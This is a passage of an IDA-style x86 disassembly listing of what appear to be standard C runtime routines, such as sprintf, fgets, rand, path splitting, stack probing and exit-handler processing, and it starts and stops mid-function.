loc_41E7A6: ; CODE XREF: _0:0041E79E�j
mov edx, [ebp+8]
xor eax, eax
mov al, [edx]
mov [ebp-4], eax
mov ecx, [ebp+8]
add ecx, 1
mov [ebp+8], ecx
loc_41E7B9: ; CODE XREF: _0:0041E7A4�j
mov dword ptr [ebp-0Ch], 0
mov dword ptr [ebp-8], 0
loc_41E7C7: ; CODE XREF: _0:0041E837�j
cmp ds:dword_453DF0, 1
jle short loc_41E7E3
push 4
mov edx, [ebp-4]
push edx
call sub_427040
add esp, 8
mov [ebp-18h], eax
jmp short loc_41E7F8
; ---------------------------------------------------------------------------
loc_41E7E3: ; CODE XREF: _0:0041E7CE�j
mov eax, [ebp-4]
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp-18h], edx
loc_41E7F8: ; CODE XREF: _0:0041E7E1�j
cmp dword ptr [ebp-18h], 0
jz short loc_41E839
push 0
push 0Ah
mov eax, [ebp-8]
push eax
mov ecx, [ebp-0Ch]
push ecx
call sub_421180
mov ecx, eax
mov esi, edx
mov eax, [ebp-4]
sub eax, 30h
cdq
add ecx, eax
adc esi, edx
mov [ebp-0Ch], ecx
mov [ebp-8], esi
mov edx, [ebp+8]
xor eax, eax
mov al, [edx]
mov [ebp-4], eax
mov ecx, [ebp+8]
add ecx, 1
mov [ebp+8], ecx
jmp short loc_41E7C7
; ---------------------------------------------------------------------------
loc_41E839: ; CODE XREF: _0:0041E7FC�j
cmp dword ptr [ebp-10h], 2Dh
jnz short loc_41E84E
mov eax, [ebp-0Ch]
neg eax
mov edx, [ebp-8]
adc edx, 0
neg edx
jmp short loc_41E854
; ---------------------------------------------------------------------------
loc_41E84E: ; CODE XREF: _0:0041E83D�j
mov eax, [ebp-0Ch]
mov edx, [ebp-8]
loc_41E854: ; CODE XREF: _0:0041E84C�j
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E860 proc near ; CODE XREF: _0:004221D2�p
push ebp
mov ebp, esp
cmp ds:off_45181C, 0
jz short loc_41E872
call ds:off_45181C
loc_41E872: ; CODE XREF: sub_41E860+A�j
push offset dword_43F030
push offset dword_43F01C
call sub_41EA30
add esp, 8
push offset dword_43F018
push offset dword_43F000
call sub_41EA30
add esp, 8
pop ebp
retn
sub_41E860 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E8A0 proc near ; CODE XREF: _0:0042222D�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push 0
mov eax, [ebp+arg_0]
push eax
call sub_41E920
add esp, 0Ch
pop ebp
retn
sub_41E8A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E8C0 proc near ; CODE XREF: _0:00422254�p
; sub_422270+22�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push 1
mov eax, [ebp+arg_0]
push eax
call sub_41E920
add esp, 0Ch
pop ebp
retn
sub_41E8C0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
push 0
push 0
call sub_41E920
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
push 1
push 0
call sub_41E920
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E920 proc near ; CODE XREF: sub_41E8A0+B�p
; sub_41E8C0+B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
call sub_41EA10
cmp ds:dword_4F3334, 1
jnz short loc_41E943
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F53CC ; GetCurrentProcess
push eax
call ds:dword_4F53C4 ; TerminateProcess
loc_41E943: ; CODE XREF: sub_41E920+10�j
mov ds:dword_4F3330, 1
mov cl, byte ptr [ebp+arg_8]
mov ds:byte_4F332C, cl
cmp [ebp+arg_4], 0
jnz short loc_41E9A3
cmp ds:dword_4F4A34, 0
jz short loc_41E991
mov edx, ds:dword_4F4A30
mov [ebp+var_4], edx
loc_41E96E: ; CODE XREF: sub_41E920:loc_41E98F�j
mov eax, [ebp+var_4]
sub eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_4F4A34
jb short loc_41E991
mov edx, [ebp+var_4]
cmp dword ptr [edx], 0
jz short loc_41E98F
mov eax, [ebp+var_4]
call dword ptr [eax]
loc_41E98F: ; CODE XREF: sub_41E920+68�j
jmp short loc_41E96E
; ---------------------------------------------------------------------------
loc_41E991: ; CODE XREF: sub_41E920+43�j
; sub_41E920+60�j
push offset dword_43F03C
push offset dword_43F034
call sub_41EA30
add esp, 8
loc_41E9A3: ; CODE XREF: sub_41E920+3A�j
push offset dword_43F048
push offset dword_43F040
call sub_41EA30
add esp, 8
cmp ds:dword_4F3338, 0
jnz short loc_41E9DE
push 0FFFFFFFFh
call sub_41D580
add esp, 4
and eax, 20h
test eax, eax
jz short loc_41E9DE
mov ds:dword_4F3338, 1
call sub_41E030
loc_41E9DE: ; CODE XREF: sub_41E920+9C�j
; sub_41E920+AD�j
cmp [ebp+arg_8], 0
jz short loc_41E9EB
call sub_41EA20
jmp short loc_41E9FF
; ---------------------------------------------------------------------------
loc_41E9EB: ; CODE XREF: sub_41E920+C2�j
mov ds:dword_4F3334, 1
mov ecx, [ebp+arg_0]
push ecx
call ds:off_4F5338
loc_41E9FF: ; CODE XREF: sub_41E920+C9�j
mov esp, ebp
pop ebp
retn
sub_41E920 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA10 proc near ; CODE XREF: sub_41E920+4�p
; sub_420C50+4�p
push ebp
mov ebp, esp
push 0Dh
call sub_423280
add esp, 4
pop ebp
retn
sub_41EA10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA20 proc near ; CODE XREF: sub_41E920+C4�p
; sub_420C50+61�p ...
push ebp
mov ebp, esp
push 0Dh
call sub_423320
add esp, 4
pop ebp
retn
sub_41EA20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA30 proc near ; CODE XREF: sub_41E860+1C�p
; sub_41E860+2E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
loc_41EA33: ; CODE XREF: sub_41EA30+21�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb short loc_41EA53
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx], 0
jz short loc_41EA48
mov edx, [ebp+arg_0]
call dword ptr [edx]
loc_41EA48: ; CODE XREF: sub_41EA30+11�j
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
jmp short loc_41EA33
; ---------------------------------------------------------------------------
loc_41EA53: ; CODE XREF: sub_41EA30+9�j
pop ebp
retn
sub_41EA30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA60 proc near ; CODE XREF: sub_401404+18C�p
; sub_401404+283�p ...
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
lea eax, [ebp+var_20]
mov [ebp+var_24], eax
lea ecx, [ebp+arg_8]
mov [ebp+var_2C], ecx
loc_41EA75: ; CODE XREF: sub_41EA60+3D�j
cmp [ebp+arg_0], 0
jnz short loc_41EA99
push offset aStringNull ; "string != NULL"
push 0
push 5Dh
push offset aSprintf_c ; "sprintf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41EA99
int 3 ; Trap to Debugger
loc_41EA99: ; CODE XREF: sub_41EA60+19�j
; sub_41EA60+36�j
xor edx, edx
test edx, edx
jnz short loc_41EA75
loc_41EA9F: ; CODE XREF: sub_41EA60+67�j
cmp [ebp+arg_4], 0
jnz short loc_41EAC3
push offset aFormatNull ; "format != NULL"
push 0
push 5Eh
push offset aSprintf_c ; "sprintf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41EAC3
int 3 ; Trap to Debugger
loc_41EAC3: ; CODE XREF: sub_41EA60+43�j
; sub_41EA60+60�j
xor eax, eax
test eax, eax
jnz short loc_41EA9F
mov ecx, [ebp+var_24]
mov dword ptr [ecx+0Ch], 42h
mov edx, [ebp+var_24]
mov eax, [ebp+arg_0]
mov [edx+8], eax
mov ecx, [ebp+var_24]
mov edx, [ebp+arg_0]
mov [ecx], edx
mov eax, [ebp+var_24]
mov dword ptr [eax+4], 7FFFFFFFh
mov ecx, [ebp+var_2C]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+var_24]
push eax
call sub_427F60
add esp, 0Ch
mov [ebp+var_28], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+var_24]
mov [eax+4], edx
mov ecx, [ebp+var_24]
cmp dword ptr [ecx+4], 0
jl short loc_41EB3F
mov edx, [ebp+var_24]
mov eax, [edx]
mov byte ptr [eax], 0
xor ecx, ecx
and ecx, 0FFh
mov [ebp+var_30], ecx
mov edx, [ebp+var_24]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+var_24]
mov [ecx], eax
jmp short loc_41EB50
; ---------------------------------------------------------------------------
loc_41EB3F: ; CODE XREF: sub_41EA60+BB�j
mov edx, [ebp+var_24]
push edx
push 0
call sub_427CE0
add esp, 8
mov [ebp+var_30], eax
loc_41EB50: ; CODE XREF: sub_41EA60+DD�j
mov eax, [ebp+var_28]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41EA60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EB60 proc near ; CODE XREF: sub_401404+45�p
; sub_401C87+31AC�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
call sub_428EE0
mov ecx, [ebp+arg_0]
mov [eax+14h], ecx
pop ebp
retn
sub_41EB60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EB70 proc near ; CODE XREF: sub_401404:loc_401559�p
; sub_401404:loc_401875�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_428EE0
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov edx, [ebp+var_4]
mov [edx+14h], ecx
mov eax, [ebp+var_4]
mov eax, [eax+14h]
shr eax, 10h
and eax, 7FFFh
mov esp, ebp
pop ebp
retn
sub_41EB70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41EBB0 proc near ; CODE XREF: sub_401404+12A�p
; sub_401C87+8C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_41EC2A
mov dh, [ecx+1]
test dh, dh
jz short loc_41EC17
loc_41EBC8: ; CODE XREF: sub_41EBB0+52�j
; sub_41EBB0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_41EBEA
test al, al
jz short loc_41EBE4
loc_41EBD9: ; CODE XREF: sub_41EBB0+32�j
mov al, [esi]
inc esi
loc_41EBDC: ; CODE XREF: sub_41EBB0+3F�j
cmp al, dl
jz short loc_41EBEA
test al, al
jnz short loc_41EBD9
loc_41EBE4: ; CODE XREF: sub_41EBB0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41EBEA: ; CODE XREF: sub_41EBB0+23�j
; sub_41EBB0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_41EBDC
lea edi, [esi-1]
loc_41EBF4: ; CODE XREF: sub_41EBB0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_41EC23
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_41EBC8
mov al, [ecx+3]
test al, al
jz short loc_41EC23
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_41EBF4
jmp short loc_41EBC8
; ---------------------------------------------------------------------------
loc_41EC17: ; CODE XREF: sub_41EBB0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_41F726
; ---------------------------------------------------------------------------
loc_41EC23: ; CODE XREF: sub_41EBB0+49�j
; sub_41EBB0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_41EC2A: ; CODE XREF: sub_41EBB0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_41EBB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EC30 proc near ; CODE XREF: sub_401404+117�p
; sub_401C87+1C23�p ...
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
lea eax, [ebp+var_20]
mov [ebp+var_24], eax
lea ecx, [ebp+arg_C]
mov [ebp+var_2C], ecx
loc_41EC45: ; CODE XREF: sub_41EC30+3D�j
cmp [ebp+arg_0], 0
jnz short loc_41EC69
push offset aStringNull ; "string != NULL"
push 0
push 5Dh
push offset aSprintf_c ; "sprintf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41EC69
int 3 ; Trap to Debugger
loc_41EC69: ; CODE XREF: sub_41EC30+19�j
; sub_41EC30+36�j
xor edx, edx
test edx, edx
jnz short loc_41EC45
loc_41EC6F: ; CODE XREF: sub_41EC30+67�j
cmp [ebp+arg_8], 0
jnz short loc_41EC93
push offset aFormatNull ; "format != NULL"
push 0
push 5Eh
push offset aSprintf_c ; "sprintf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41EC93
int 3 ; Trap to Debugger
loc_41EC93: ; CODE XREF: sub_41EC30+43�j
; sub_41EC30+60�j
xor eax, eax
test eax, eax
jnz short loc_41EC6F
mov ecx, [ebp+var_24]
mov dword ptr [ecx+0Ch], 42h
mov edx, [ebp+var_24]
mov eax, [ebp+arg_0]
mov [edx+8], eax
mov ecx, [ebp+var_24]
mov edx, [ebp+arg_0]
mov [ecx], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+var_24]
push ecx
call sub_427F60
add esp, 0Ch
mov [ebp+var_28], eax
mov edx, [ebp+var_24]
mov eax, [edx+4]
sub eax, 1
mov ecx, [ebp+var_24]
mov [ecx+4], eax
mov edx, [ebp+var_24]
cmp dword ptr [edx+4], 0
jl short loc_41ED0E
mov eax, [ebp+var_24]
mov ecx, [eax]
mov byte ptr [ecx], 0
xor edx, edx
and edx, 0FFh
mov [ebp+var_30], edx
mov eax, [ebp+var_24]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+var_24]
mov [edx], ecx
jmp short loc_41ED1F
; ---------------------------------------------------------------------------
loc_41ED0E: ; CODE XREF: sub_41EC30+BA�j
mov eax, [ebp+var_24]
push eax
push 0
call sub_427CE0
add esp, 8
mov [ebp+var_30], eax
loc_41ED1F: ; CODE XREF: sub_41EC30+DC�j
mov eax, [ebp+var_28]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41EC30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ED30 proc near ; CODE XREF: sub_401404+F7�p
; sub_401C87+2175�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_C], 0
mov [ebp+var_8], 0
mov eax, [ebp+arg_0]
push eax
call sub_41BC70
add esp, 4
cmp eax, 1
jb short loc_41ED8B
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx+1]
cmp edx, 3Ah
jnz short loc_41ED8B
cmp [ebp+arg_4], 0
jz short loc_41ED80
push 2
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_4298C0
add esp, 0Ch
mov edx, [ebp+arg_4]
mov byte ptr [edx+2], 0
loc_41ED80: ; CODE XREF: sub_41ED30+35�j
mov eax, [ebp+arg_0]
add eax, 2
mov [ebp+arg_0], eax
jmp short loc_41ED97
; ---------------------------------------------------------------------------
loc_41ED8B: ; CODE XREF: sub_41ED30+23�j
; sub_41ED30+2F�j
cmp [ebp+arg_4], 0
jz short loc_41ED97
mov ecx, [ebp+arg_4]
mov byte ptr [ecx], 0
loc_41ED97: ; CODE XREF: sub_41ED30+59�j
; sub_41ED30+5F�j
mov [ebp+var_C], 0
mov edx, [ebp+arg_0]
mov [ebp+var_4], edx
jmp short loc_41EDAF
; ---------------------------------------------------------------------------
loc_41EDA6: ; CODE XREF: sub_41ED30:loc_41EE0C�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_41EDAF: ; CODE XREF: sub_41ED30+74�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_41EE0E
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
xor edx, edx
mov dl, ds:byte_4F38E1[ecx]
and edx, 4
test edx, edx
jz short loc_41EDDA
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp short loc_41EE0C
; ---------------------------------------------------------------------------
loc_41EDDA: ; CODE XREF: sub_41ED30+9D�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 2Fh
jz short loc_41EDF0
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 5Ch
jnz short loc_41EDFB
loc_41EDF0: ; CODE XREF: sub_41ED30+B3�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_C], edx
jmp short loc_41EE0C
; ---------------------------------------------------------------------------
loc_41EDFB: ; CODE XREF: sub_41ED30+BE�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 2Eh
jnz short loc_41EE0C
mov edx, [ebp+var_4]
mov [ebp+var_8], edx
loc_41EE0C: ; CODE XREF: sub_41ED30+A8�j
; sub_41ED30+C9�j ...
jmp short loc_41EDA6
; ---------------------------------------------------------------------------
loc_41EE0E: ; CODE XREF: sub_41ED30+87�j
cmp [ebp+var_C], 0
jz short loc_41EE64
cmp [ebp+arg_8], 0
jz short loc_41EE5C
mov eax, [ebp+var_C]
sub eax, [ebp+arg_0]
cmp eax, 0FFh
jnb short loc_41EE32
mov ecx, [ebp+var_C]
sub ecx, [ebp+arg_0]
mov [ebp+var_14], ecx
jmp short loc_41EE39
; ---------------------------------------------------------------------------
loc_41EE32: ; CODE XREF: sub_41ED30+F5�j
mov [ebp+var_14], 0FFh
loc_41EE39: ; CODE XREF: sub_41ED30+100�j
mov edx, [ebp+var_14]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_8]
push edx
call sub_4298C0
add esp, 0Ch
mov eax, [ebp+arg_8]
add eax, [ebp+var_10]
mov byte ptr [eax], 0
loc_41EE5C: ; CODE XREF: sub_41ED30+E8�j
mov ecx, [ebp+var_C]
mov [ebp+arg_0], ecx
jmp short loc_41EE70
; ---------------------------------------------------------------------------
loc_41EE64: ; CODE XREF: sub_41ED30+E2�j
cmp [ebp+arg_8], 0
jz short loc_41EE70
mov edx, [ebp+arg_8]
mov byte ptr [edx], 0
loc_41EE70: ; CODE XREF: sub_41ED30+132�j
; sub_41ED30+138�j
cmp [ebp+var_8], 0
jz loc_41EF1A
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_0]
jb loc_41EF1A
cmp [ebp+arg_C], 0
jz short loc_41EECF
mov ecx, [ebp+var_8]
sub ecx, [ebp+arg_0]
cmp ecx, 0FFh
jnb short loc_41EEA5
mov edx, [ebp+var_8]
sub edx, [ebp+arg_0]
mov [ebp+var_18], edx
jmp short loc_41EEAC
; ---------------------------------------------------------------------------
loc_41EEA5: ; CODE XREF: sub_41ED30+168�j
mov [ebp+var_18], 0FFh
loc_41EEAC: ; CODE XREF: sub_41ED30+173�j
mov eax, [ebp+var_18]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+arg_C]
push eax
call sub_4298C0
add esp, 0Ch
mov ecx, [ebp+arg_C]
add ecx, [ebp+var_10]
mov byte ptr [ecx], 0
loc_41EECF: ; CODE XREF: sub_41ED30+15A�j
cmp [ebp+arg_10], 0
jz short loc_41EF18
mov edx, [ebp+var_4]
sub edx, [ebp+var_8]
cmp edx, 0FFh
jnb short loc_41EEEE
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_1C], eax
jmp short loc_41EEF5
; ---------------------------------------------------------------------------
loc_41EEEE: ; CODE XREF: sub_41ED30+1B1�j
mov [ebp+var_1C], 0FFh
loc_41EEF5: ; CODE XREF: sub_41ED30+1BC�j
mov ecx, [ebp+var_1C]
mov [ebp+var_10], ecx
mov edx, [ebp+var_10]
push edx
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_10]
push ecx
call sub_4298C0
add esp, 0Ch
mov edx, [ebp+arg_10]
add edx, [ebp+var_10]
mov byte ptr [edx], 0
loc_41EF18: ; CODE XREF: sub_41ED30+1A3�j
jmp short loc_41EF6E
; ---------------------------------------------------------------------------
loc_41EF1A: ; CODE XREF: sub_41ED30+144�j
; sub_41ED30+150�j
cmp [ebp+arg_C], 0
jz short loc_41EF62
mov eax, [ebp+var_4]
sub eax, [ebp+arg_0]
cmp eax, 0FFh
jnb short loc_41EF38
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_0]
mov [ebp+var_20], ecx
jmp short loc_41EF3F
; ---------------------------------------------------------------------------
loc_41EF38: ; CODE XREF: sub_41ED30+1FB�j
mov [ebp+var_20], 0FFh
loc_41EF3F: ; CODE XREF: sub_41ED30+206�j
mov edx, [ebp+var_20]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_C]
push edx
call sub_4298C0
add esp, 0Ch
mov eax, [ebp+arg_C]
add eax, [ebp+var_10]
mov byte ptr [eax], 0
loc_41EF62: ; CODE XREF: sub_41ED30+1EE�j
cmp [ebp+arg_10], 0
jz short loc_41EF6E
mov ecx, [ebp+arg_10]
mov byte ptr [ecx], 0
loc_41EF6E: ; CODE XREF: sub_41ED30:loc_41EF18�j
; sub_41ED30+236�j
mov esp, ebp
pop ebp
retn
sub_41ED30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41EF80 proc near ; CODE XREF: sub_401B0B+8�p
; sub_401C87+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_41EFA0
loc_41EF8C: ; CODE XREF: sub_41EF80+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_41EF8C
loc_41EFA0: ; CODE XREF: sub_41EF80+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_41EF80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EFB0 proc near ; CODE XREF: sub_401C87+75EF�p
; sub_401C87+761C�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_10], ecx
loc_41EFC5: ; CODE XREF: sub_41EFB0+3D�j
cmp [ebp+arg_0], 0
jnz short loc_41EFE9
push offset aStringNull ; "string != NULL"
push 0
push 3Bh
push offset aFgets_c ; "fgets.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41EFE9
int 3 ; Trap to Debugger
loc_41EFE9: ; CODE XREF: sub_41EFB0+19�j
; sub_41EFB0+36�j
xor edx, edx
test edx, edx
jnz short loc_41EFC5
loc_41EFEF: ; CODE XREF: sub_41EFB0+67�j
cmp [ebp+arg_8], 0
jnz short loc_41F013
push offset dword_43C514
push 0
push 3Ch
push offset aFgets_c ; "fgets.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41F013
int 3 ; Trap to Debugger
loc_41F013: ; CODE XREF: sub_41EFB0+43�j
; sub_41EFB0+60�j
xor eax, eax
test eax, eax
jnz short loc_41EFEF
cmp [ebp+arg_4], 0
jg short loc_41F026
xor eax, eax
jmp loc_41F0E7
; ---------------------------------------------------------------------------
loc_41F026: ; CODE XREF: sub_41EFB0+6D�j
mov ecx, [ebp+arg_8]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
push edx
call sub_422420
add esp, 4
loc_41F038: ; CODE XREF: sub_41EFB0:loc_41F0CD�j
mov eax, [ebp+arg_4]
sub eax, 1
mov [ebp+arg_4], eax
cmp [ebp+arg_4], 0
jz loc_41F0D2
mov ecx, [ebp+var_4]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+var_4]
mov [eax+4], edx
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+4], 0
jl short loc_41F083
mov edx, [ebp+var_4]
mov eax, [edx]
movsx ecx, byte ptr [eax]
and ecx, 0FFh
mov [ebp+var_14], ecx
mov edx, [ebp+var_4]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+var_4]
mov [ecx], eax
jmp short loc_41F092
; ---------------------------------------------------------------------------
loc_41F083: ; CODE XREF: sub_41EFB0+B1�j
mov edx, [ebp+var_4]
push edx
call sub_427100
add esp, 4
mov [ebp+var_14], eax
loc_41F092: ; CODE XREF: sub_41EFB0+D1�j
mov eax, [ebp+var_14]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_41F0B1
mov ecx, [ebp+var_8]
cmp ecx, [ebp+arg_0]
jnz short loc_41F0AF
mov [ebp+var_10], 0
jmp short loc_41F0D8
; ---------------------------------------------------------------------------
loc_41F0AF: ; CODE XREF: sub_41EFB0+F4�j
jmp short loc_41F0D2
; ---------------------------------------------------------------------------
loc_41F0B1: ; CODE XREF: sub_41EFB0+EC�j
mov edx, [ebp+var_8]
mov al, byte ptr [ebp+var_C]
mov [edx], al
movsx ecx, byte ptr [ebp+var_C]
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
cmp ecx, 0Ah
jnz short loc_41F0CD
jmp short loc_41F0D2
; ---------------------------------------------------------------------------
loc_41F0CD: ; CODE XREF: sub_41EFB0+119�j
jmp loc_41F038
; ---------------------------------------------------------------------------
loc_41F0D2: ; CODE XREF: sub_41EFB0+95�j
; sub_41EFB0:loc_41F0AF�j ...
mov eax, [ebp+var_8]
mov byte ptr [eax], 0
loc_41F0D8: ; CODE XREF: sub_41EFB0+FD�j
mov ecx, [ebp+var_4]
push ecx
call sub_422490
add esp, 4
mov eax, [ebp+var_10]
loc_41F0E7: ; CODE XREF: sub_41EFB0+71�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41EFB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F0F0 proc near ; CODE XREF: sub_426C90+1C3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_41F110
add esp, 10h
pop ebp
retn
sub_41F0F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F110 proc near ; CODE XREF: sub_41F0F0+11�p
; sub_41F450+11�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
